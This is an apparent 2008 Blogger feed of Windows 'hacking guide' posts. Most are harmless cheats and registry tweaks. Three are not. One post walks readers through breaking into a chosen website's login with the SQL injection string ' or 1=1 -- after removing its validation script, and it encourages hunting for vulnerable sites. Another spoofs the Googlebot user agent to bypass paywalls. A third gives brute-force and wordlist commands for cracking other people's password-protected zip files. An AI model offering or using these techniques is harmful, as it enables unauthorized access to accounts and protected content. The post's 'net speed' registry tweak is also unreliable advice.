instantly win.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Hidden Game Modes&lt;br /&gt;Instructions - In the "Game" menu choose "Select Game". Enter &lt;strong&gt;-1 or -2&lt;/strong&gt; to activate the hidden game modes.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Solitaire&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Instant Win&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Instructions - &lt;strong&gt;Press Alt + Shift + 2&lt;/strong&gt; during game play to instantly win.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Draw single cards in a Draw Three game&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Instructions - Hold down &lt;strong&gt;CTRL + ALT + SHIFT&lt;/strong&gt; while drawing a new card. 
Instead of drawing three cards you will only draw one.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Infinite Points&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Instructions - In the Windows XP version of Solitaire, draw from the deck at least twice. Hold Ctrl and drag a card down from the deck. Press the "A" key and then release the left mouse button. You get 10 points for this. Keep doing it for infinite points!&lt;br /&gt;&lt;br /&gt;Secret - Infinite Points II&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Instructions - Finish a game of Solitaire with the time bonus option on. The cards start bouncing. Click on the Solitaire screen and the "play again" box pops up. Select No, so the Solitaire screen is just blank green. Use the instant win cheat (Alt + Shift + 2) and the time bonus from your last game is added to that game's score. For example, if your time bonus was 5000 and your final score was 6000, after using this glitch you will have a score of 11000. This glitch can be used as many times as you want.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hearts&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Secret - Registry hack to see your opponents' cards&lt;br /&gt;Instructions - Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts. NOTE: you may have to create the Hearts key under Applets. In the right-hand pane, create a new String Value. &lt;strong&gt;Immediately rename it to "ZB" (without the quotes); give it a value of "42" (again, sans quotes). 
The next time you're in a game of Hearts, press CTRL + SHIFT + ALT + F12.&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-162854999178673091?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/162854999178673091/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=162854999178673091' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/162854999178673091'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/162854999178673091'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/minesweeper-secret-reveal-mines.html' title='Windows game cheats'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-5712898614033291267</id><published>2008-01-30T07:02:00.000-08:00</published><updated>2008-01-30T07:08:53.404-08:00</updated><title type='text'>Remove windows messenger from xp</title><content type='html'>Copy and paste the following to a text file, and save as &lt;strong&gt;RemoveMsgr.bat&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;@echo off&lt;br /&gt;RunDll32 advpack.dll,LaunchINFSection %windir%\inf\msmsgs.inf,BLC.Remove&lt;br /&gt;@echo REGEDIT4&gt;%TMP%\RemoveMsgr.reg&lt;br /&gt;@echo.&gt;&gt;%TMP%\RemoveMsgr.reg&lt;br /&gt;@echo 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express]&gt;&gt;%TMP%\RemoveMsgr.reg&lt;br /&gt;@echo "Hide Messenger"=dword:00000002&gt;&gt;%TMP%\RemoveMsgr.reg&lt;br /&gt;@echo.&gt;&gt;%TMP%\RemoveMsgr.reg&lt;br /&gt;regedit /s %TMP%\RemoveMsgr.reg&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;• Close all Internet Explorer windows.&lt;br /&gt;• Run RemoveMsgr.bat, When prompted, click Yes to close all affected applications.&lt;br /&gt;• Restart your computer for the changes to take effect.&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;strong&gt;You are done ..&lt;/strong&gt;&lt;/em&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-5712898614033291267?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/5712898614033291267/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=5712898614033291267' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/5712898614033291267'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/5712898614033291267'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/copy-and-paste-following-to-text-file.html' title='Remove windows messenger from xp'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-1535864552700651759</id><published>2008-01-30T04:21:00.000-08:00</published><updated>2008-01-30T04:28:29.996-08:00</updated><title type='text'>Secret Backdoor</title><content type='html'>Many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.&lt;br /&gt;Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.&lt;br /&gt;How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.&lt;br /&gt;&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]&lt;br /&gt;@="Googlebot/2.1"&lt;br /&gt;"Compatible"="+http://www.googlebot.com/bot.html"&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;You're done!&lt;br /&gt;&lt;br /&gt;You may always change it back again.... 
I know of only one site that uses your User Agent to establish your eligibility to use its services, and that's the Windows Update site.&lt;br /&gt;To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge it with your registry:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#33cc00;"&gt;Windows Registry Editor Version 5.00&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]&lt;br /&gt;@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5&lt;/span&gt;&lt;/strong&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/1535864552700651759/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=1535864552700651759' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/1535864552700651759'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/1535864552700651759'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/secret-backdoor.html' title='Secret Backdoor'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-4967274985070296147</id><published>2008-01-30T04:18:00.000-08:00</published><updated>2008-01-30T04:20:26.398-08:00</updated><title 
type='text'>Hacking web sites(another trick)</title><content type='html'>Servers with a one-step login can be accessed via this method.&lt;br /&gt;&lt;br /&gt;Not for all websites.&lt;br /&gt;&lt;br /&gt;If you have HTML and JavaScript knowledge, then you can access password-protected websites.&lt;br /&gt;1. Open the website you want to hack. Provide a wrong username and password in its login form.&lt;br /&gt;&lt;br /&gt;(e.g. Username: me and Password: ' or 1=1 --)&lt;br /&gt;&lt;br /&gt;An error will occur saying wrong username-password. Now be prepared.&lt;br /&gt;&lt;br /&gt;Your experiment starts from here...&lt;br /&gt;&lt;br /&gt;2. Right click anywhere on that error page =&gt;&gt; go to &lt;strong&gt;view source.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. There you can see the &lt;strong&gt;&lt;span style="color:#336666;"&gt;HTML code with JavaScript.&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. There you find something like this....&lt;span style="color:#000099;"&gt; &lt;_form action="..login...."&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;5. Before this login information, copy the URL of the site you are on.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;(e.g. "&lt;_form..........action=http://www.targetwebsite.com/login.......&gt;")&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;6. Then delete the JavaScript from the above that validates your information in the server. (Do this very carefully; your success in hacking the site depends upon this, i.e. how efficiently you delete the JavaScript that validates your account information.)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7. Then take a close look for "&lt;_input name="password" type="password"&gt;" [without quotes] -&gt; put "&lt;_type=text&gt;" there instead of "&lt;_type=password&gt;". 
See there, if the maxlength of the password is less than 11, then increase it to 11 (e.g : if then write )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;8. Just go to File =&gt; Save As and save it anywhere on your hard disk with the extension .html (e.g. c:\eg.html)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;9. Reopen your target web page by double clicking the 'eg.html' file that you have saved.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;10. You see some changes in the current page as compared to the original one. Don't get worried.&lt;br /&gt;&lt;br /&gt;11. Provide any username [e.g. hacker] and password [e.g. ' or 1=1 --]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Congrats!!!!!! You have successfully cracked the above website and entered into the account of the first user saved in the server's database.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;[Please read "_form"="form" &amp;amp; "_type"="type" &amp;amp; "_input"="input" without quotes]&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;The above trick won't work on websites using the latest techniques to protect their servers. 
But you can find many sites !!&lt;br /&gt;Enjoy !!</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/4967274985070296147/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=4967274985070296147' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4967274985070296147'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4967274985070296147'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/hacking-web-sitesanother-trick.html' title='Hacking web sites(another trick)'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-274463883684920551</id><published>2008-01-30T04:11:00.000-08:00</published><updated>2008-01-30T04:18:18.877-08:00</updated><title type='text'>Crack password protected zip files</title><content type='html'>I will do it by using &lt;strong&gt;FZC&lt;/strong&gt;.&lt;br /&gt;What is FZC?&lt;br /&gt;FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). 
You can get it anywhere - just use a search engine such as altavista.com.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;FZC uses multiple methods of cracking -&lt;strong&gt; bruteforce&lt;/strong&gt; (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks: instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.&lt;br /&gt;&lt;br /&gt;The first thing I want to say is that reading this tutorial is the easy way to learn how to use this program, but after reading this part on how to use FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;FZC is a good password recovery tool&lt;/strong&gt;, because it's very fast and also supports resuming, so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or uppercase letter or a symbol such as ! or &amp;amp;) because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal..heehhe.. 
To see the time that FZC takes with brute force, just open the Bforce.txt file, which contains such information.&lt;br /&gt;FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, on various topics, or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.&lt;br /&gt;&lt;br /&gt;Now that you have a good wordlist, just get FZC working on the locked zip file.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;We need to keep in mind that some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack with a wordlist (unless you have some weird wordlist). If you have bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB list and start using the Brute Force attack.&lt;br /&gt;&lt;br /&gt;If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! 
FZC has multiple settings for all sorts of hardware, and will automatically select the best method.&lt;br /&gt;&lt;br /&gt;Now that we've gone through all the theoretical stuff, let's get to the actual commands.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;Bruteforce&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The command line you'll need to use for brute force is:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#009900;"&gt;fzc -mb -nzFile.zip -lChr Length -cType of chars&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Now if you read the bforce.txt that comes with fzc you'll find the description of how Chr Length and the Type of chars work, but hey, I'm gonna explain this too. Why not, right?... (but remember to look at the bforce.txt too)&lt;br /&gt;&lt;br /&gt;For Chr Length you can use 4 kinds of switches...&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;-&gt; You can use a range -&gt; 4-6 : it would brute force from 4-char passwords to 6-char passwords&lt;br /&gt;-&gt; You can use just one length -&gt; 5 : it would just brute force using passwords with 5 chars&lt;br /&gt;-&gt; You can also use the "all" number -&gt; 0 : it would start brute forcing from passwords with length 0 to length 32; even if you are crazy I don't think that you would do this.... if you are thinking of doing this, get a life...&lt;br /&gt;-&gt; You can use the + sign with a number -&gt; 3+ : in this case it would brute force from passwords with length 3 to passwords with 32 chars of length, almost like the last option...&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;For the Type of chars we have 5 switches; they are:&lt;br /&gt;&lt;br /&gt;-&gt; a for using lowercase letters&lt;br /&gt;-&gt; A for using uppercase letters&lt;br /&gt;-&gt; ! 
for using symbols (check the Bforce.txt if you want to see which symbols)&lt;br /&gt;-&gt; s for using space&lt;br /&gt;-&gt; 1 for using numbers&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;If you want to find a password with lowercase and numbers by brute force you would just do something like:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;fzc -mb -nzTest.zip -l4-7 -ca1&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;This would try all combinations from passwords with 4 chars of length up to 7 chars, but just using numbers and lowercase.&lt;br /&gt;&lt;br /&gt;*****&lt;br /&gt;hint&lt;br /&gt;*****&lt;br /&gt;&lt;br /&gt;You should never start the first brute force attack on a file using all the char switches; first just try lowercase, then uppercase, then uppercase with numbers, then lowercase with numbers. Do it like this because you can get lucky and find the password much faster. If this doesn't work, just prepare your brain and start with a brute force that would take a lot of time, with a combination like lowercase, uppercase, special chars and numbers.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;Wordlist&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Like I said before, and like you should be thinking now, the wordlist is the most powerful mode in this program. 
Using this mode, you can choose between 3 modes, where each one does some changes to the text that is in the wordlist. I'm not going to say what each mode does to the words; to know that, just check the file wlist.txt. The only thing I'm going to tell you is that the best mode to get passwords is mode 3, but it takes a longer time too.&lt;br /&gt;To start a wordlist attack you'll do something like:&lt;br /&gt;&lt;br /&gt;fzc -mwMode number -nzFile.zip -nwWordlist&lt;br /&gt;&lt;br /&gt;Where:&lt;br /&gt;&lt;br /&gt;Mode number is 1, 2 or 3; just check wlist.txt to see the changes in each mode.&lt;br /&gt;File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory as FZC you'll need to give the full path.&lt;br /&gt;&lt;br /&gt;You can add other switches to that line, like -fLine, where you define at which line FZC will start reading, and -lChar Length, where only the words with that char length will be read; the switch works like in bruteforce mode.&lt;br /&gt;So if you run something like&lt;br /&gt;&lt;br /&gt;fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+&lt;br /&gt;&lt;br /&gt;FZC would just start reading at line 50 and would just read words with length &gt;= 9.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;&lt;br /&gt;If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50, you would do:&lt;br /&gt;&lt;br /&gt;fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;Resuming&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Another good feature in FZC is that FZC supports resuming. 
If you need to shut down your computer while FZC is running, you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack, the current status will be saved in a file called resume.fzc, but if you are using a wordlist it will tell you at what line it ended (you can find the line in the file fzc.log too).&lt;br /&gt;To resume the bruteforce attack you just need to do:&lt;br /&gt;&lt;br /&gt;fzc -mr&lt;br /&gt;&lt;br /&gt;And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.&lt;br /&gt;But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack on file.zip at line 100 using wordlist.txt in mode 3, to resume you'll type&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;fzc -mw3 -nzfile.zip -nwwordlist.txt -f100&lt;br /&gt;&lt;br /&gt;Doing this, FZC would start at line 100, since the other 99 lines were already checked in an earlier FZC session.&lt;/strong&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/274463883684920551/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=274463883684920551' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/274463883684920551'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/274463883684920551'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/crack-password-protected-zip-files.html' title='Crack password protected zip 
files'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3397728960361506608</id><published>2008-01-15T06:56:00.001-08:00</published><updated>2008-01-15T06:56:21.371-08:00</updated><title type='text'>Add an Option to Print the Contents of a Folder !!</title><content type='html'>&lt;p&gt;First, you need to create a batch file called &lt;strong&gt;Printdir.bat.&lt;/strong&gt; &lt;strong&gt;Open Notepad&lt;/strong&gt; or another text editor and type (or cut and paste) this text:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;@echo off&lt;br /&gt;dir %1 /-p /o:gn &amp;gt; "%temp%\Listing"&lt;br /&gt;start /w notepad /p "%temp%\Listing"&lt;br /&gt;del "%temp%\Listing"&lt;br /&gt;exit&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Now, in the Save As dialog box, type &lt;strong&gt;"%windir%\Printdir.bat"&lt;/strong&gt; (without the quotation marks) and click the Save button.&lt;br /&gt;Click Start, Control Panel, Folder Options.&lt;br /&gt;Click the File Types tab, and then click File Folder.&lt;br /&gt;Click the Advanced button.&lt;br /&gt;Click the New button.&lt;br /&gt;&lt;br /&gt;&lt;font color="#339966"&gt;&lt;strong&gt;In the Action box, type "Print Directory Listing"&lt;/strong&gt;&lt;/font&gt; (without the quotation marks).&lt;br /&gt;&lt;br /&gt;In the Application used to perform action box, type&lt;strong&gt;&lt;font color="#00ff00"&gt; "Printdir.bat"&lt;/font&gt;&lt;/strong&gt; (without the quotation marks).&lt;br /&gt;&lt;br /&gt;Click OK in all three dialog boxes to close them.&lt;br /&gt;&lt;br /&gt;You're not quite finished yet! Now you need to edit the Registry, so open your favorite Registry Editor.&lt;br /&gt;&lt;br /&gt;Navigate to &lt;strong&gt;HKEY_CLASSES_ROOT\Directory\shell.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;Right click on "default" and select &lt;strong&gt;Modify.&lt;br /&gt;&lt;/strong&gt;In the &lt;font color="#0000ff"&gt;Value data box, type "none"&lt;/font&gt; (without the quotation marks).&lt;br /&gt;&lt;br /&gt;Click OK and close the Registry Editor.&lt;br /&gt;&lt;br /&gt;Now when you right click a folder, you'll see the option to Print Directory Listing. Selecting it will print the contents of the folder.&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/3397728960361506608/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3397728960361506608' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3397728960361506608'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3397728960361506608'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/add-option-to-print-contents-of-folder.html' title='Add an Option to Print the Contents of a Folder !!'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3701160681022255631</id><published>2008-01-15T06:44:00.000-08:00</published><updated>2008-01-15T06:46:25.958-08:00</updated><title type='text'>Increase your Net speed manually no need of Any software !!</title><content type='html'>First, you need to go to&lt;br /&gt;Start, then &lt;strong&gt;Run.&lt;/strong&gt;&lt;br /&gt;Type in&lt;strong&gt; regedit&lt;/strong&gt; in the box.&lt;br /&gt;Next, go to the&lt;br /&gt;key &lt;strong&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\VxD\MSTCP&lt;br /&gt;&lt;/strong&gt;Now, find the &lt;strong&gt;&lt;span style="color:#009900;"&gt;string Default Rcv Window&lt;/span&gt;&lt;/strong&gt;.&lt;br /&gt;Now, edit the number to&lt;strong&gt; 64240&lt;/strong&gt; (was 65535).&lt;br /&gt;Reboot your computer and now you have &lt;span style="color:#3366ff;"&gt;increased your net speed&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/3701160681022255631/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3701160681022255631' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3701160681022255631'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3701160681022255631'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/increase-your-net-speed-manually-no.html' title='Increase your Net speed manually no need of Any 
software !!'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-8056277430383696198</id><published>2008-01-15T06:43:00.000-08:00</published><updated>2008-01-15T06:44:53.996-08:00</updated><title type='text'>Eliminating the Right Click on the Desktop !!</title><content type='html'>Take a backup before editing the registry.&lt;br /&gt;&lt;br /&gt;1. Start &lt;span style="color:#33cc00;"&gt;Regedit&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;2. Go to &lt;strong&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;3. Add a DWORD value and give it the name&lt;span style="color:#000099;"&gt; NoViewContextMenu &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;4. Give it a value of &lt;strong&gt;1 &lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;5. 
Reboot&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-8056277430383696198?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/8056277430383696198/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=8056277430383696198' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8056277430383696198'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8056277430383696198'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/01/eliminating-right-click-on-desktop.html' title='Eliminating the Right Click on the Desktop !!'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-4547288711945006676</id><published>2008-01-15T06:38:00.000-08:00</published><updated>2008-01-15T06:43:54.390-08:00</updated><title type='text'>Disabling the F3 search key</title><content type='html'>1. Start Regedit&lt;br /&gt;&lt;br /&gt;2. Go to &lt;strong&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;3. Create a &lt;span style="color:#33cc00;"&gt;Dword value called NoFindFiles&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;4. Give it a value of &lt;span style="color:#000099;"&gt;1&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;5. 
